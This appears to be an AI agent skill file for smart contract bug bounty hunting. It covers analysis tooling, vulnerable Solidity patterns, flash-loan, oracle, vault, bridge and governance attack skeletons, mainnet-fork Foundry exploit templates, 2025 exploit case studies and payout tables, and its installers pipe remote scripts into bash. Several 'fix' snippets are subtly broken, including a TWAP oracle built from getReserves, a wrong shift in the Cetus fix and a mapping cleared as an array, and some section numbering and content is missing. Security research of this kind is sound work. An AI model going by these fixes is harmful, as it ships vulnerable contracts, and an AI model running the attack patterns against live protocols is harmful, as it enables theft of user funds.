---
name: smart-contract-exploiter
description: Automated smart contract vulnerability scanning and exploit development for bug bounty. Use when auditing Solidity/Vyper contracts, building PoC exploits for DeFi protocols, hunting on Arkham/Immunefi/Code4rena, or developing automated exploit chains for smart contract vulnerabilities.
domain: cybersecurity
subdomain: blockchain-security
tags:
- smart-contract
- solidity
- vyper
- defi
- exploit
- bug-bounty
- arkham
- immunefi
- slither
- foundry
- flash-loan
- mev
- cross-chain
version: '1.0'
license: MIT
nist_csf:
- ID.RA-01
- PR.DS-01
- PR.DS-02
---

# Smart Contract Exploiter

## Overview

Smart contract bug bounty hunting pays $10k-$10M per critical finding. This skill covers the complete exploit development lifecycle: automated scanning with Slither/Mythril, manual code review, exploit prototyping with Foundry, flash loan attack patterns, MEV strategies, cross-chain bridge exploits, NFT vulnerabilities, DAO governance attacks, and submission to platforms like Arkham Intelligence, Immunefi, Code4rena, and Sherlock.

## When to Use

- Hunting on Arkham Intelligence bug bounty programs
- Auditing smart contracts for Immunefi, Code4rena, Sherlock submissions
- Building PoC exploits for discovered vulnerabilities
- Analyzing DeFi protocol economic attack vectors
- Reviewing token contracts for rug pull indicators
- Testing upgrade mechanisms and proxy patterns
- Developing automated exploit chains
- Analyzing cross-chain bridge vulnerabilities
- Auditing NFT contracts (ERC721/ERC1155)
- Testing DAO governance mechanisms
- Analyzing L2-specific vulnerabilities (Optimism, Arbitrum, zkSync)

## When NOT to Use

- Target has no bug bounty program or written authorization
- Simple token transfer testing (use block explorers)
- Real-time price monitoring (use DeFi dashboards)
- Gas optimization (use dedicated tools)

## Prerequisites

- Python 3.10+ with pip
- Node.js 18+ (for Hardhat projects)
- Foundry (forge, cast, anvil)
- Slither (pip install slither-analyzer)
- Mythril (pip install mythril)
- Echidna (optional, for fuzzing)
- solc-select for compiler management
- RPC endpoints (Alchemy, Infura, or local node)

## Installation

```bash
# Install Foundry (forge, cast, anvil)
curl -L https://foundry.paradigm.xyz | bash
foundryup

# Install Slither
pip install slither-analyzer

# Install Mythril
pip install mythril

# Install Echidna (optional)
# See: https://github.com/crytic/echidna

# Install solc-select for compiler management
pip install solc-select
solc-select install 0.8.19
solc-select use 0.8.19

# Install Aderyn (Rust-based Solidity analyzer)
curl -L https://raw.githubusercontent.com/Cyfrin/aderyn/dev/cyfrinup/install | bash
cyfrinup
aderyn .
```

## The Process

1. **Scope the task** — define objectives, boundaries, and success criteria
2. **Gather information** — collect all necessary data and context before proceeding
3. **Execute the core workflow** — follow the domain-specific steps methodically
4. **Validate results** — verify outputs against expected outcomes or baselines
5. **Document findings** — record results, anomalies, and recommendations

### Step 1: Target Reconnaissance

Before diving into code analysis:

1. **Contract discovery** — Etherscan, Blockscout, deployment transaction
2. **Source verification** — Is source code verified? Compiler version?
3. **Proxy detection** — Is it a proxy? What's the implementation?
4. **Dependency mapping** — What does it import? OpenZeppelin version?
5. **TVL assessment** — How much value is locked? Higher TVL = higher bounty
6. **Admin controls** — What can the owner/admin do? Multisig?
7. **Attack surface** — External calls, state variables, access control
8. **Token standards** — ERC20, ERC721, ERC1155, ERC4626?
9. **DeFi protocol type** — AMM, lending, vault, bridge, DAO?

```bash
# Check contract on Etherscan
cast code 0xCONTRACT_ADDRESS --rpc-url ethers

# Verify proxy detection
cast storage 0xCONTRACT_ADDRESS 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc

# Get contract ABI
cast abi 0xCONTRACT_ADDRESS --rpc-url ethers

# Get contract creation tx
cast creation 0xCONTRACT_ADDRESS --rpc-url ethers

# Check implementation (if proxy)
cast implementation 0xCONTRACT_ADDRESS --rpc-url ethers

# Get all storage slots
cast storage 0xCONTRACT_ADDRESS --rpc-url ethers
```

### Step 2: Automated Analysis

Run multiple tools in parallel for comprehensive coverage:

#### Slither Static Analysis

```bash
# Basic analysis
slither . --print human-summary

# Specific vulnerability detectors
slither . --detect reentrancy-eth,reentrancy-no-eth
slither . --detect unchecked-transfer
slither . --detect arbitrary-send-eth
slither . --detect weak-prng
slither . --detect uninitialized-state
slither . --detect uninitialized-storage
slither . --detect controlled-delegatecall
slither . --detect delegatecall-loop
slither . --detect tx-origin
slither . --detect assembly
slither . --detect low-level-calls
slither . --detect constable-states
slither . --detect external-function

# All detectors
slither . --detect all

# JSON output for parsing
slither . --json results.json

# Print contract summary
slither . --print contract-summary

# Print function summaries
slither . --print function-summary

# Print inheritance graph
slither . --print inheritance-graph
```

#### Mythril Symbolic Execution

```bash
# Analyze single contract
mythril analyze contract.sol --execution-timeout 90

# Analyze with specific solc version
mythril analyze contract.sol --solv 0.8.19

# JSON output
mythril analyze contract.sol --json --execution-timeout 90

# Deep analysis (longer timeout)
mythril analyze contract.sol --execution-timeout 300 --max-depth 22

# Analyze deployed contract
mythril analyze 0xCONTRACT_ADDRESS --rpc infura-mainnet

# Custom loop bound
mythril analyze contract.sol --max-depth 30 --loop-bound 50
```

#### Aderyn (Cyfrin)

```bash
# Run Aderyn analyzer
aderyn .

# Output JSON
aderyn . --json

# Custom output path
aderyn . --output results.json
```

#### Echidna Fuzzing

```bash
# Create echidna config
cat > echidna.yaml << EOF
testMode: "assertion"
testLimit: 50000
shrinkLimit: 5000
seqLen: 100
deployer: "0x10000"
sender: ["0x10000", "0x20000", "0x30000"]
EOF

# Run fuzzer
echidna-test . --contract TestContract --config echidna.yaml

# Property-based testing
echidna-test . --contract TestContract --testMode property
```

#### Foundry Fuzzing

```bash
# Run fuzz tests
forge test --match-test testFuzz -vvvv

# Increase fuzz runs
forge test --match-test testFuzz --fuzz-runs 10000
```

### Step 3: Vulnerability Classes (Ranked by Payout)

> **2025-2026 UPDATE**: Rounding/precision errors have surpassed reentrancy as the #1 attack vector. The three largest exploits of 2025 (Balancer $128M, Cetus $223M, yETH $9M) all used rounding errors. **Test batch operations and state reset patterns first.**

#### Critical ($100k-$10M)

**Rounding/Precision Errors (2025 #1 Vector)**
```solidity
// VULNERABLE: Precision loss in _upscale function (Balancer-style)
function _upscale(uint amount, uint scalingFactor) internal pure returns (uint) {
    return FixedPoint.mulDown(amount, scalingFactor);
    // When amount is small (8-9 wei) and scalingFactor is large,
    // mulDown truncates to 0 due to integer division
}

// ATTACK: Micro-swaps compound rounding errors
// 1. Push pool balance to critical 8-9 wei threshold
// 2. Execute 65+ micro-swaps (amount=17 vs balance=18)
// 3. Each swap loses ~10% precision via rounding
// 4. Accumulated error suppresses BPT price
// 5. Buy BPT at suppressed price, redeem at full value

// FIX: Use mulUp for critical operations, validate invariant after batch
function _upscale(uint amount, uint scalingFactor) internal pure returns (uint) {
    return FixedPoint.mulUp(amount, scalingFactor);
}

// FIX: Add invariant check after batch operations
function batchSwap(...) external {
    // ... swap logic ...
    require(_verifyInvariant(), "Invariant violated");
}
```

**State Reset Vulnerability (yETH-style)**
```solidity
// VULNERABLE: Cached state not cleared when pool emptied
mapping(uint => uint) packed_vbs; // Cached virtual balances

function remove_liquidity(uint amount) external {
    // Burns LP tokens, decrements packed_vbs
    // BUT: When supply hits 0, packed_vbs retains residual values!
}

function add_liquidity(uint amount) external {
    if (supply == 0) {
        // "First-ever deposit" logic reads stale cached values
        // Instead of calculating from actual deposit, reads packed_vbs
        // Result: Mints septillions of LP tokens from dust deposit
    }
}

// FIX: Explicitly clear ALL cached state when supply hits zero
function remove_liquidity(uint amount) external {
    // ... burn logic ...
    if (supply == 0) {
        packed_vbs = new uint[](0); // CLEAR CACHE
    }
}

// FIX: Add domain checks for "first deposit" scenario
function add_liquidity(uint amount) external {
    if (supply == 0) {
        require(amount > MIN_DEPOSIT, "Dust deposit blocked");
        // Verify no stale cached state exists
        require(packed_vbs.length == 0, "Stale cache detected");
    }
}
```

**Library Bug Propagation (Cetus-style)**
```solidity
// VULNERABLE: Bug in third-party library becomes protocol bug
// integer-mate library's checked_shlw had wrong mask
// Left-shift overflow wrapped silently in Move language
// Result: $223M exploit on Sui blockchain

// FIX: Audit ALL dependencies, not just protocol code
// FIX: Add runtime assertions for critical math operations
function checked_shlw(value: u128, shift: u8): (u128, u8) {
    let mask = (1u128 << shift) - 1; // Correct mask
    let overflow = value & mask;
    let result = value >> shift;
    (result, if (overflow > 0) { 1 } else { 0 })
}
```

**Reentrancy**
```solidity
// VULNERABLE: state update after external call
function withdraw() external {
    uint balance = balances[msg.sender];
    (bool success, ) = msg.sender.call{value: balance}("");
    require(success);
    balances[msg.sender] = 0; // TOO LATE
}

// FIX: checks-effects-interactions
function withdraw() external {
    uint balance = balances[msg.sender];
    balances[msg.sender] = 0; // State first
    (bool success, ) = msg.sender.call{value: balance}("");
    require(success);
}

// VULNERABLE: cross-function reentrancy
function transfer(address to, uint amount) external {
    require(balances[msg.sender] >= amount);
    balances[msg.sender] -= amount;
    balances[to] += amount;
}

function withdraw() external {
    uint balance = balances[msg.sender];
    (bool success, ) = msg.sender.call{value: balance}("");
    require(success);
    balances[msg.sender] = 0;
}
// Attacker: receive() calls transfer() before balances[msg.sender] = 0
```

**Flash Loan Attacks**
```solidity
// Flash loan exploit pattern
contract FlashLoanExploit {
    function attack() external {
        // Step 1: Flash loan from Aave/dYdX
        uint amount = 1000000 ether;
        IFlashLender(lender).flashLoan(amount);
    }
    
    function executeOperation(
        address asset,
        uint amount,
        uint premium,
        address initiator,
        bytes calldata params
    ) external returns (bool) {
        // Step 2: Manipulate price oracle
        manipulatePrice();
        
        // Step 3: Exploit vulnerable protocol
        exploitProtocol();
        
        // Step 4: Repay flash loan + premium
        IERC20(asset).transfer(lender, amount + premium);
        
        // Step 5: Keep profit
        return true;
    }
    
    function manipulatePrice() internal {
        // Swap large amount to skew price
        uint reserve0 = pair.reserve0();
        uint reserve1 = pair.reserve1();
        // Flash loan drains one side → price manipulation
    }
}
```

**Access Control**
```solidity
// VULNERABLE: missing access control
function setOwner(address newOwner) external {
    owner = newOwner; // Anyone can call!
}

// VULNERABLE: wrong visibility
function _authorizeUpgrade(address impl) public {
    // Should be internal
}

// VULNERABLE: missing modifier
function mint(address to, uint amount) external {
    _mint(to, amount); // Missing onlyOwner
}

// FIX: Proper access control
function setOwner(address newOwner) external onlyOwner {
    owner = newOwner;
}
```

**Integer Overflow/Underflow**
```solidity
// Pre-0.8.0: silent overflow
uint8 x = 255;
x += 1; // Becomes 0, no revert

// Post-0.8.0: reverts by default
// But unchecked blocks still vulnerable
unchecked {
    uint8 x = 255;
    x += 1; // Becomes 0
}

// VULNERABLE: unchecked in critical math
function calculateReward(uint amount) internal pure returns (uint) {
    unchecked {
        return amount * rewardRate / 1e18; // Overflow possible
    }
}
```

#### High ($10k-$100k)

**Oracle Manipulation**
```solidity
// VULNERABLE: spot price from single DEX
function getPrice() returns (uint) {
    return token.balanceOf(address(pair)) * 1e18 / 
           otherToken.balanceOf(address(pair));
}
// Flash loan drains one side → price manipulation

// VULNERABLE: single oracle source
function getPrice() returns (uint) {
    return IChainlinkOracle(oracle).latestAnswer();
}
// Oracle can be manipulated if single source

// FIX: Use TWAP oracle (Chainlink, Uniswap TWAP)
function getPrice() returns (uint) {
    (uint price0Cumulative, uint price1Cumulative, uint32 blockTimestamp) = 
        IUniswapV2Pair(pair).getReserves();
    
    uint timeElapsed = blockTimestamp - blockTimestampLast;
    uint amount0 = (price0Cumulative - price0CumulativeLast) / timeElapsed;
    uint amount1 = (price1Cumulative - price1CumulativeLast) / timeElapsed;
    
    return (amount0 * 1e18) / amount1;
}
```

**Accounting Desync**
```solidity
// VULNERABLE: rounding error in shares
function deposit(uint amount) external returns (uint shares) {
    shares = amount * totalShares / totalAssets;
    // If totalAssets is small, shares rounds to 0
    _mint(msg.sender, shares);
    totalAssets += amount;
}

function withdraw(uint shares) external returns (uint amount) {
    amount = shares * totalAssets / totalShares;
    // Attacker deposits 1 wei, gets 0 shares, deposits more
    _burn(msg.sender, shares);
    totalAssets -= amount;
}

// FIX: Round shares up, amount down
function deposit(uint amount) external returns (uint shares) {
    shares = (amount * totalShares + totalAssets - 1) / totalAssets;
    _mint(msg.sender, shares);
    totalAssets += amount;
}
```

**Signature Replay**
```solidity
// VULNERABLE: no nonce, no chain ID check
function execute(address to, uint value, bytes memory data, bytes memory sig) {
    bytes32 hash = keccak256(abi.encodePacked(to, value, data));
    address signer = ECDSA.recover(hash, sig);
    require(signer == owner);
    // Same signature can be reused!
}

// VULNERABLE: missing nonce
function execute(address to, uint value, bytes memory data, bytes memory sig) {
    bytes32 hash = keccak256(abi.encodePacked(to, value, data, block.chainid));
    address signer = ECDSA.recover(hash, sig);
    require(signer == owner);
    // Replay within same block!
}

// FIX: Include nonce and chain ID
bytes32 hash = keccak256(abi.encodePacked(to, value, data, nonce, block.chainid));
```

**Proxy/Upgrade Vulnerabilities**
```solidity
// VULNERABLE: storage collision
contract Proxy {
    address implementation; // Slot 0
    address owner; // Slot 1
}

contract Implementation {
    address owner; // Slot 0 - COLLISION!
    uint256 value; // Slot 1
}

// VULNERABLE: uninitialized implementation
contract Implementation {
    bool initialized;
    
    function initialize(address _owner) external {
        require(!initialized);
        owner = _owner;
        initialized = true;
    }
    // Missing: disableInitializers() in constructor
}

// FIX: EIP-1967 storage slots
bytes32 private constant IMPLEMENTATION_SLOT = 
    0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;

// FIX: disableInitializers()
constructor() {
    _disableInitializers();
}
```

#### Medium ($1k-$10k)

**Denial of Service**
```solidity
// VULNERABLE: iterating over all users
function distributeRewards() external {
    for (uint i = 0; i < users.length; i++) {
        // If array grows too large, gas limit blocks execution
        users[i].transfer(reward);
    }
}

// VULNERABLE: griefing with small deposits
function claimReward() external {
    require(rewards[msg.sender] > 0);
    // Attacker deposits dust → rewards calculation fails
}

// FIX: Pull pattern
mapping(address => uint) public pendingRewards;

function claimReward() external {
    uint amount = pendingRewards[msg.sender];
    pendingRewards[msg.sender] = 0;
    payable(msg.sender).transfer(amount);
}
```

**Front-Running / MEV**
```solidity
// VULNERABLE: transaction ordering dependence
function buyToken() external payable {
    uint price = tokenPrice;
    // Price changes after this tx
    token.transfer(msg.sender, msg.value / price);
}

// VULNERABLE: sandwich attack vector
function swap(uint amountIn, uint amountOutMin) external {
    uint amountOut = getAmountOut(amountIn);
    require(amountOut >= amountOutMin);
    // MEV bot can sandwich this
}

// FIX: Use commit-reveal or private mempool
function buyToken() external payable {
    // Commit phase
    commitments[msg.sender] = keccak256(abi.encodePacked(amount, nonce));
}

function revealBuy(uint amount, uint nonce) external {
    // Reveal phase
    require(commitments[msg.sender] == keccak256(abi.encodePacked(amount, nonce)));
}
```

**Centralization Risks**
```solidity
// VULNERABLE: owner can drain
function withdrawFunds() external onlyOwner {
    payable(owner).transfer(address(this).balance);
}

// VULNERABLE: no timelock
function setFee(uint newFee) external onlyOwner {
    fee = newFee; // Can change instantly
}

// FIX: Timelock + multisig
TimelockController timelock;

function setFee(uint newFee) external {
    // Must go through timelock
    bytes memory data = abi.encodeCall(this.setFee, (newFee));
    timelock.schedule(address(this), 0, data, bytes32(0), bytes32(0), delay);
}
```

### Step 4: DeFi Protocol Attack Patterns

#### AMM (Uniswap-style)
```solidity
// Manipulate reserves for profit
function manipulateAMM() external {
    // Step 1: Flash loan large amount
    uint amount = flashLoan(1000000 ether);
    
    // Step 2: Swap to skew reserves
    router.swapExactTokensForTokens(amount, 0, path, address(this), deadline);
    
    // Step 3: Exploit protocol using manipulated price
    protocol.deposit(manipulatedAmount);
    
    // Step 4: Swap back
    router.swapExactTokensForTokens(balance, 0, reversePath, address(this), deadline);
    
    // Step 5: Repay flash loan
    repayFlashLoan();
}
```

#### Lending Protocol (Aave-style)
```solidity
// Liquidation manipulation
function manipulateLiquidation() external {
    // Step 1: Flash loan to crash collateral price
    crashCollateralPrice();
    
    // Step 2: Liquidate position at discount
    lending.liquidate(borrower, collateral, repayAmount);
    
    // Step 3: Restore price
    restorePrice();
    
    // Step 4: Profit from liquidation bonus
}
```

#### Vault (ERC4626)
```solidity
// Share price manipulation
function manipulateVault() external {
    // Step 1: Donate to vault to inflate share price
    token.transfer(address(vault), donationAmount);
    
    // Step 2: Deposit at inflated price
    vault.deposit(depositAmount, address(this));
    
    // Step 3: Withdraw at even higher price
    vault.withdraw(withdrawAmount, address(this), address(this));
    
    // Profit from rounding error
}
```

#### Cross-Chain Bridge
```solidity
// Bridge message manipulation
function exploitBridge() external {
    // Step 1: Send message to source chain
    bridge.sendMessage(destinationChain, payload);
    
    // Step 2: Replay message on destination
    // If bridge doesn't track used messages
    bridge.executeMessage(message, signature);
    
    // Step 3: Repeat for double-spend
}
```

#### DAO Governance
```solidity
// Flash loan governance attack
function attackGovernance() external {
    // Step 1: Flash loan governance tokens
    uint tokens = flashLoan(governanceToken, 1000000 ether);
    
    // Step 2: Vote on proposal
    governance.castVote(proposalId, support);
    
    // Step 3: Repay flash loan
    repayFlashLoan(governanceToken, tokens);
    
    // Governance decision made without holding tokens
}
```

### Step 5: Real-World Exploit Case Studies (2025)

#### Case Study 1: Balancer V2 ($128M) — Rounding Error
**Date**: November 3, 2025
**Chains**: Ethereum, Arbitrum, Optimism, Base, Polygon, Sonic
**Root Cause**: Precision loss in `_upscaleArray` function

**Attack Flow**:
1. Deploy exploit contract (constructor executes attack)
2. Push pool balances to critical 8-9 wei threshold
3. Execute 65+ micro-swaps (amount=17 vs balance=18)
4. Each swap loses ~10% precision via `mulDown` truncation
5. Accumulated error suppresses BPT price artificially
6. Buy BPT at suppressed price, redeem at full value
7. Withdraw via `manageUserBalance()`

**Key Insight**: Traditional testing focuses on individual operations, not cumulative effects of adversarial batch operations. The `_scalingFactors` override (added after OpenZeppelin audit) introduced non-unitary values that made rounding exploitable.

#### Case Study 2: Yearn yETH ($9M) — State Reset Failure
**Date**: December 1, 2025
**Chain**: Ethereum
**Root Cause**: Cached `packed_vbs[]` values never cleared when pool emptied

**Attack Flow**:
1. Flash loan LST assets (wstETH, rETH, WETH, etc.)
2. 10+ deposit/withdrawal cycles to poison `packed_vbs[]` storage
3. Withdraw all liquidity (supply=0, but cached values remain)
4. Deposit 16 wei → triggers "first-ever deposit" logic
5. Protocol reads stale cached values from storage
6. Mints 235 septillion yETH (2.35 × 10^56) from dust deposit
7. Swap minted tokens for real assets, repay flash loan

**Key Insight**: "supply == 0" does NOT mean "pristine state". Complex DeFi systems need explicit handling of ALL state transitions.

#### Case Study 3: Cetus ($223M) — Library Bug
**Date**: May 22, 2025
**Chain**: Sui
**Root Cause**: Bug in `checked_shlw` helper in integer-mate library

**Attack Flow**:
1. Spoofed tokens into tick range 300,000-300,200
2. Flash-loan-funded cycle
3. Contract misprices deposits due to silent overflow
4. Withdraw far more than deposited
5. Validators froze $162M via governance vote (91% stake)

**Key Insight**: Third-party libraries are an attack surface. Move language's memory safety didn't catch logical error in mask calculation.

### Step 6: Manual Code Review Checklist

Focus on high-value areas (updated 2025-2026):

```
PRIORITY 1 - ROUNDING/PRECISION (2025 #1 Vector):
- [ ] Batch operations: Test cumulative effects, not just individual ops
- [ ] Rounding direction: mulDown vs mulUp in critical paths
- [ ] Scaling factors: Non-unitary values enable precision attacks
- [ ] Small value handling: 8-9 wei range maximizes truncation
- [ ] State reset: All cached values cleared when supply hits zero?
- [ ] Re-initialization: Can bootstrap paths be re-entered adversarially?

PRIORITY 2 - ACCESS CONTROL & LOGIC:
- [ ] External calls: Every .call, .transfer, .send is potential reentrancy
- [ ] State changes: Are they before or after external calls?
- [ ] Access control: Who can call what? Are modifiers correct?
- [ ] Math: Division before multiplication? Rounding? Precision?
- [ ] Upgrades: Storage layout compatible? Initializers protected?

PRIORITY 3 - ECONOMIC ATTACKS:
- [ ] Economic invariants: Can flash loans break assumptions?
- [ ] Oracle dependencies: Single source? Manipulable? TWAP?
- [ ] Token approvals: Unlimited approvals? Race conditions?
- [ ] Callback patterns: Reentrancy via callback tokens (ERC777)?

PRIORITY 4 - IMPLEMENTATION DETAILS:
- [ ] Assembly blocks: Without comments? Unchecked operations?
- [ ] tx.origin usage: Phishing attack vector?
- [ ] Floating pragma: Not pinned to specific version?
- [ ] selfdestruct: Callable by anyone?
- [ ] Block timestamp: Dependence (miners can manipulate ±15s)?
- [ ] Gas limits: DoS via unbounded loops?
- [ ] Integer math: Overflow/underflow in unchecked blocks?
- [ ] Token standards: ERC20 return values checked?
- [ ] Proxy patterns: Storage collision? Uninitialized?
- [ ] Cross-chain: Message validation? Replay protection?
- [ ] Flash loan: Can flash loan break protocol assumptions?
- [ ] Dependencies: All third-party libraries audited?
```

### Step 6: Exploit Development with Foundry

#### Setup Exploit Project

```bash
# Create new Foundry project
forge init exploit-poc
cd exploit-poc

# Install dependencies
forge install openzeppelin/openzeppelin-contracts
forge install foundry-rs/forge-std
forge install aave/aave-v3-core
forge install uniswap/v3-core
```

#### Write Exploit Contract

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "forge-std/Test.sol";
import "../src/VulnerableContract.sol";

contract ExploitTest is Test {
    VulnerableContract target;
    address attacker = address(0x1337);
    
    function setUp() public {
        // Fork mainnet at specific block
        vm.createSelectFork("mainnet", 18000000);
        
        // Deploy or connect to target
        target = VulnerableContract(0xTARGET_ADDRESS);
        
        // Fund attacker
        vm.deal(attacker, 100 ether);
    }
    
    function testExploit() public {
        vm.startPrank(attacker);
        
        // Step 1: Flash loan
        // Step 2: Manipulate price
        // Step 3: Exploit vulnerability
        // Step 4: Repay loan + profit
        
        vm.stopPrank();
        
        // Verify profit
        uint profit = address(this).balance;
        assertGt(profit, 0, "No profit extracted");
        emit log_named_uint("Profit (ETH)", profit);
    }
}
```

#### Flash Loan Exploit Template

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "forge-std/Test.sol";
import "../src/VulnerableProtocol.sol";

interface IFlashLoanPool {
    function flashLoan(
        address receiver,
        address token,
        uint256 amount,
        bytes calldata params
    ) external;
}

contract FlashLoanExploit is Test {
    VulnerableProtocol target;
    IFlashLoanPool pool;
    IERC20 token;
    address attacker = address(0x1337);
    
    function setUp() public {
        vm.createSelectFork("mainnet", 18000000);
        
        target = VulnerableProtocol(0xTARGET);
        pool = IFlashLoanPool(0xPOOL);
        token = IERC20(0xTOKEN);
        
        vm.deal(attacker, 10 ether);
    }
    
    function testFlashLoanExploit() public {
        vm.startPrank(attacker);
        
        // Initiate flash loan
        pool.flashLoan(
            address(this),
            address(token),
            1000000 ether,
            abi.encode("attack")
        );
        
        vm.stopPrank();
        
        // Verify profit
        uint profit = token.balanceOf(address(this));
        assertGt(profit, 0, "No profit");
        emit log_named_uint("Profit", profit);
    }
    
    function executeOperation(
        address asset,
        uint256 amount,
        uint256 premium,
        address initiator,
        bytes calldata params
    ) external returns (bool) {
        // Attack logic here
        exploitProtocol();
        
        // Repay flash loan
        IERC20(asset).transfer(pool, amount + premium);
        
        return true;
    }
    
    function exploitProtocol() internal {
        // Manipulate price
        // Exploit vulnerability
        // Extract profit
    }
}
```

#### Run Exploit

```bash
# Run test
forge test --match-test testExploit -vvvv

# Fork from specific block
forge test --fork-url https://eth-mainnet.alchemyapi.io/v2/YOUR_KEY --fork-block-number 18000000

# Gas snapshot
forge snapshot

# Debug with traces
forge test --match-test testDebug -vvvv --debug
```

### Step 7: Arkham Intelligence Specifics

Arkham Intelligence focuses on on-chain intelligence and attribution:

1. **Target Selection** — Focus on protocols with high TVL and complex tokenomics
2. **Attribution Analysis** — Map wallet addresses to entities
3. **Transaction Pattern Analysis** — Identify suspicious flows
4. **Smart Contract Auditing** — Full audit of deployed contracts
5. **Economic Attack Modeling** — Simulate flash loan scenarios
6. **L2 Coverage** — Optimism, Arbitrum, zkSync, Base

```bash
# Query Arkham API for contract intelligence
curl -X GET "https://api.arkhamintelligence.com/v1/contracts/0xADDRESS" \
  -H "Authorization: Bearer YOUR_API_KEY"

# Get transaction history
curl -X GET "https://api.arkhamintelligence.com/v1/transactions/0xADDRESS" \
  -H "Authorization: Bearer YOUR_API_KEY"

# Get entity attribution
curl -X GET "https://api.arkhamintelligence.com/v1/entities/0xADDRESS" \
  -H "Authorization: Bearer YOUR_API_KEY"

# Get fund flows
curl -X GET "https://api.arkhamintelligence.com/v1/flows/0xADDRESS" \
  -H "Authorization: Bearer YOUR_API_KEY"
```

### Step 8: Multi-Language Support

#### Vyper Contracts
```bash
# Slither supports Vyper
slither contract.vy

# Manual review focuses on:
# - Reentrancy (Vyper has no built-in guard)
# - Integer overflow (pre-0.3.0)
# - Access control (no modifiers, use @external)
```

#### Move Contracts (Sui, Aptos)
```bash
# Move-specific vulnerabilities:
# - Resource handling errors
# - Reference safety issues
# - Module initialization bugs
# - Event emission issues

# Tools:
# - Move Prover (formal verification)
# - Sui security scanner
# - Aptos CLI audit
```

#### Cairo Contracts (StarkNet)
```bash
# Cairo-specific vulnerabilities:
# - Felt overflow (252-bit prime field)
# - Storage layout issues
# - syscall handling
# - Reference counting bugs

# Tools:
# - Cairo security scanner
# - StarkNet audit tools
```

### Step 9: Report Format (Immunefi/Arkham)

```markdown
## Title
[Severity] Brief description of vulnerability

## Target
Contract: 0x...
Chain: Ethereum/Arbitrum/Optimism/Polygon/Base
TVL: $X
Block: X

## Vulnerability Type
Reentrancy / Access Control / Oracle Manipulation / Flash Loan / MEV / etc.

## Impact
- Funds at risk: $X
- Attack complexity: Low/Medium/High
- Prerequisites: Flash loan capital, specific conditions
- Affected users: All / Specific positions

## Root Cause
[Technical explanation of why the vulnerability exists]

## Proof of Concept
[Working Foundry/Hardhat test with detailed comments]

## Attack Flow
1. Step 1: ...
2. Step 2: ...
3. Step 3: ...

## Recommended Fix
[Specific code change with before/after comparison]

## References
- SWC-ID: SWC-XXX
- CWE: CWE-XXX
- Similar exploits: [Link to past incidents]
```

## Revenue Potential

| Skill Level | Focus | Monthly Range |
|------------|-------|---------------|
| Beginner | Reentrancy, access control | $0-$5,000 |
| Intermediate | Oracle manipulation, flash loans | $5,000-$50,000 |
| Advanced | Economic exploits, novel attack chains | $50,000-$500,000 |
| Elite | 0-day discovery, protocol-level bugs | $500,000+ |

## Web3-Specific Red Flags

- `tx.origin` for authentication (phishing attack vector)
- Floating pragma (`pragma solidity ^0.8.0` instead of specific version)
- `selfdestruct` callable by anyone
- Unchecked return values from `.call()`
- Block timestamp dependence (miners can manipulate ±15s)
- Assembly blocks without comments
- Missing events for state changes
- No reentrancy guard on external calls with state changes
- Single oracle source without TWAP
- Unlimited token approvals
- Missing pause mechanism for emergencies
- No timelock on admin functions
- Centralized upgrade authority

## Tools

| Purpose | Tools |
|---------|-------|
| Static analysis | Slither, Mythril, Securify2, Aderyn |
| Fuzzing | Echidna, Foundry fuzz, Medusa |
| Testing | Foundry (forge), Hardhat, Brownie |
| Block explorer | Etherscan, Blockscout, Sourcify, Blocknative |
| DeFi data | DeFiLlama, Dune Analytics, DefiSafety, DeBank |
| MEV analysis | Flashbots Protect, MEV Blocker, EigenPhi, MEV-Explore |
| Exploit frameworks | Foundry, Brownie, Ape, Titanoboa |
| On-chain intel | Arkham Intelligence, Nansen, Dune, Arkham |
| Formal verification | Certora, Halmos, SMTChecker |
| Cross-chain | LayerZero, Wormhole, Axelar explorers |

## Bug Bounty Platforms (Updated 2026)

| Platform | Focus | Max Bounty | Key Stats |
|----------|-------|------------|-----------|
| **Immunefi** | DeFi/Web3 | $15.5M (Uniswap v4) | $134M+ paid, 85K+ researchers, 92.33% of criticals |
| **Sherlock** | Protocol audits | $16M (Usual) | 52% hit rate, stake-to-submit ($250) |
| **Code4rena** | Competitive audits | $250K per contest | Community-driven, public results |
| **HackenProof** | Crypto projects | $50K+ | 200+ active programs, $15.7M+ paid |
| **Cantina** | Competitive audits | $5M (Coinbase) | Growing platform |
| **Arkham Intelligence** | On-chain intel | Varies (ARKM) | Intel Marketplace + Immunefi BBP |
| **CodeHawks** | Smart contracts | $100K+ | Emerging platform |
| **Hats Finance** | Decentralized bounties | $50K+ | No KYC, permissionless |

### Top Active Bounties (March 2026)

| Protocol | Platform | Max Bounty |
|----------|----------|------------|
| Usual | Sherlock | $16,000,000 |
| Uniswap v4 | Immunefi | $15,500,000 |
| LayerZero | Immunefi | $15,000,000 |
| Wormhole | Immunefi | $10,000,000 |

### Immunefi Q1 2026 Statistics

- **Total Payouts**: $7.87M (+228% QoQ)
- **Paid Reports**: 1,104
- **Average Payout**: $7,131 per report (+178% QoQ)
- **Notable Criticals**: $300K, $125K, $100K
- **Cumulative All-Time**: $134M+
- **Active Programs**: 230+
- **TVL Protected**: $190B+
- **Critical Disclosure Share**: 92.33%

### Payout Statistics

| Severity | Median | Average | Range |
|----------|--------|---------|-------|
| Critical | $20,000 | $114,355 | $10K-$10M |
| High | $5,300 | $5,300 | $1K-$50K |
| Medium | $2,000 | $2,000 | $500-$10K |
| Low | $500 | $500 | $100-$1K

## Practice Platforms

- [Damn Vulnerable DeFi](https://www.damnvulnerabledefi.xyz/) — DeFi security puzzles
- [Ethernaut](https://ethernaut.openzeppelin.com/) — Smart contract CTF
- [Paradigm CTF](https://github.com/paradigmxyz/paradigm-ctf-2023) — Advanced challenges
- [Curta CTF](https://github.com/curta-institute/curta-ctf) — On-chain puzzles
- [Sherlock Practice](https://app.sherlock.xyz/) — Past audit contests
- [DeFi Hack Labs](https://github.com/SunWeb3Sec/DeFiHackLabs) — Reproduce DeFi hacks
- [DeFi Vulnerability](https://github.com/pcaversaccio/deFi-vulnerabilities) — Vulnerability database
- [Smart Contract Hacking](https://www.smartcontracthacking.com/) — Free courses

## Red Flags

- Performing actions without explicit written authorization from the asset owner
- Testing against production systems without a defined scope and rules of engagement
- Exploiting vulnerabilities for personal gain (always report responsibly)
- Sharing exploit code publicly before patches are deployed
- Failing to quantify economic impact accurately
- Not considering second-order effects of exploits
- Ignoring cross-chain implications

## Verification

